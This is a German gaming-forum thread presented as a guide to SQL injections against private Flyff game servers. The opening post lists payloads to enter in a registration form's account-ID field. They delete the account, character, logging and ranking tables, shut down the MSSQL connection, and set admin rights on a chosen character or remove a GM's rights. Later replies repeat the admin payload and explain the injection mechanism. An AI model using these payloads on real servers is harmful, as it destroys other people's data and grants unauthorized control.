[Guide]Auflistung der SQL Injections

**Frucht** · 02.01.10, 23:46

Hier stelle ich mal eine kleine Auflistung der mir bisher bekannten Sql-Injections rein!

Code:
```
';delete account_tbl;--
```
Löscht die Accountdatenbank
Code:
```
';delete character_01_tbl;--
```
Löscht die Characterdatenbank
Code:
```
';delete logging_01_tbl;--
```
Löscht die Loggdatenbank
Code:
```
';delete ranking_tbl;--
```
Löscht die Rankingdatenbank
Code:
```
';shutdown;--
```
Schließt die MSSQL Verbindung!

Code:

 USE [CHARACTER_01_DBF]
 
UPDATE CHARACTER_TBL SET m_chAuthority='Z'
 WHERE m_szName='ACCOUNTID' and serverindex='01'
 
USE [ACCOUNT_DBF]
 
UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
 WHERE account='CHARACTERNAME' and gamecode='A000'

Gibt deinen Charackter Adminrechte!
Damit kann man auch einen Admin GM oder sonstiges mit Ingamerrechten die rechte entziehen,mann muss nur jediglich die AccountID und den Characktername wissen und aus em 'Z' ein 'F' machen!

Wie das funktioniert?

Einfach den Code bei der Regristrierungsseite eingebe,wo normalerweise deine Accountid rein kommt!

Ich werde diesen Thread updaten,sobald neue Codes bekannt sind!

Viel Spaß

wünscht Frucht

**MeMyselfAndI** · 02.01.10, 23:51

Nice.^^

Auf Inposterum Workt es nicht. Auf Fame auch net. Offi garantiert net xD
Auf welchen workt es denn? :D

Hast ein THX ^-^

LG & Guten Rutsch
MeMyselfAndI

**felix** · 02.01.10, 23:54

Auf denen die in ihren Inputs Sonderzeichen erlauben.

**Frucht** · 03.01.10, 00:06

Hatte kleine Fehler in den Code´s.

Jetzt sind die Code´s zu 100% richtig! (99,99%) xD

**Foldercarp** · 03.01.10, 00:19

Wie soll das funzen?
Weil, hat dann der PC Adminrechte oder wie meinst du das,''Deinen Charakter''

**Steamblade** · 03.01.10, 00:21

USE [CHARACTER_01_DBF]

UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='ACCOUNTID' and serverindex='01'

USE [ACCOUNT_DBF]

UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='CHARACTERNAME' and gamecode='A000'

AccounID: Da gibst du deine ID ein , womit du dich ins Spiel einlogst.
Charaktername: Der Name vom Charakter der die Rechte erhalten soll

Dann hat dein Flyff Charakter die Adminrechte

**Frucht** · 03.01.10, 00:21

Zitat von Foldercarp [Um Links zu sehen registriere dich bitte. Klicke hier.]

Wie soll das funzen?
Weil, hat dann der PC Adminrechte oder wie meinst du das,''Deinen Charakter''

Nein,man gibt das einfach in das Regristrierungsscript ein.

Dann wird das ausgeführt.

Und dein Charackter hat entweder Ingamer Rechte.

Oder Datenbanken werden gelöscht.

Oder die Verbindung zwischen Mssql bricht ab...

**Foldercarp** · 03.01.10, 00:26

Dumme frager aber mit Early Guard würde das auch gehen oder? xD

**Frucht** · 03.01.10, 00:29

Zitat von Foldercarp [Um Links zu sehen registriere dich bitte. Klicke hier.]

Dumme frager aber mit Early Guard würde das auch gehen oder? xD

Ya würde es.

Man kann es aber ganz leicht fixxen,indem man im Regiscript keine Sonderzeichen erlaubt.

**TwiLight** · 03.01.10, 00:30

Zitat von Foldercarp [Um Links zu sehen registriere dich bitte. Klicke hier.]

Dumme frager aber mit Early Guard würde das auch gehen oder? xD

ErlyGuard überwacht Packets auf bestimmten Ports aber nicht die Verbindung zwischen SQL und HTTP o.ô

**Etzel** · 03.01.10, 01:09

Vielen dank tolle Leistung

**felix** · 03.01.10, 01:23

Man man Man, da hier einige das Prinzip von SQL Injections nicht verstehen.
Hier mal ein Beispiel eines auszuführenden SQL Statements:

SELECT * FROM `accounts` WHERE `username` = '".$_POST['username']."'

$_POST['username'] ist das was wir in das Textfeld eingegeben und abgeschickt haben.
Schreiben wir also 'Felix' in das Textfeld so heißt unser SQL Statement

SELECT * FROM `accounts` WHERE `username` = 'Felix'

Aber da wir ganz böse Buben sind (und solche coolen "Hacker" wie akira Udo einer ist)
schreiben wir natürlich nicht unseren Accountnamen
rein sondern versuchen schön den Server putt zu machen. Also wie geht das? Ganz einfach
der Coder im ersten Beispiel (das bin ich :D) hat natürlich keine Ahnung von der Materie
und denkt sich "WTF?!! TAGS MASKIEREN? WASN DAT?" Also schreiben wir in
unser Textfeld einfach "ich bin ein böser hacker' DELETE `accounts`--;"
Nun heißt unser SQL Statement so:

SELECT * FROM `accounts` WHERE `username` = 'ich bin ein böser hacker' DELETE `accounts`--;'

Was passiert nun? Anstatt das das Script locker fluffig die Daten des ausgewählten
accounts liest löscht es das account table. Und nein die beiden Minuszeichen (--) sind
kein "voll str3ng geheimer h4cking c0de" sondern sind ein Kommentar in SQL und
bewirken was alles was nach unserem DELETE Statement steht igoniert wird.

**Fixed** · 03.01.10, 09:29

Lest euch das durch und schau euch die Struktur der Offi DB an, dann wisst ihr bescheid : [Um Links zu sehen registriere dich bitte. Klicke hier.]
Hatte da auch mal eine Tutorial in Englisch, welches besser erklärt war, finde das aber gerade nicht.

**Tom94** · 03.01.10, 13:58

Zitat von MeMyselfAndI [Um Links zu sehen registriere dich bitte. Klicke hier.]

Nice.^^

Auf Inposterum Workt es nicht. Auf Fame auch net. Offi garantiert net xD
Auf welchen workt es denn? :D

Hast ein THX ^-^

LG & Guten Rutsch
MeMyselfAndI

Soweit ich weiß hat DD in frühen Zeiten tatsächlich offi FlyFF durch ne Injection drangekriegt... ;)
(Kann mich aber auch irren... die Gerüchteküche ist nicht zu unterschätzen.)

**escaPe** · 03.01.10, 15:31

Nice. Hast nen thanks.
Aber wieso funksen die nicht bei Fame?

MMORPG Core - Deutsche Community für Online Rollenspiele - Powered by vBulletin

Thema: [Guide]Auflistung der SQL Injections

LinkBack

Themen-Optionen

Anzeige

[Guide]Auflistung der SQL Befehle!

Die folgenden 13 Mitglieder bedankten sich bei Frucht für diesen Beitrag:

Das folgende Mitglied bedankt sich bei felix für diesen Beitrag:

Die folgenden 2 Mitglieder bedankten sich bei Steamblade für diesen Beitrag:

Das folgende Mitglied bedankt sich bei TwiLight für diesen Beitrag:

Die folgenden 4 Mitglieder bedankten sich bei felix für diesen Beitrag:

Lesezeichen

Lesezeichen

Berechtigungen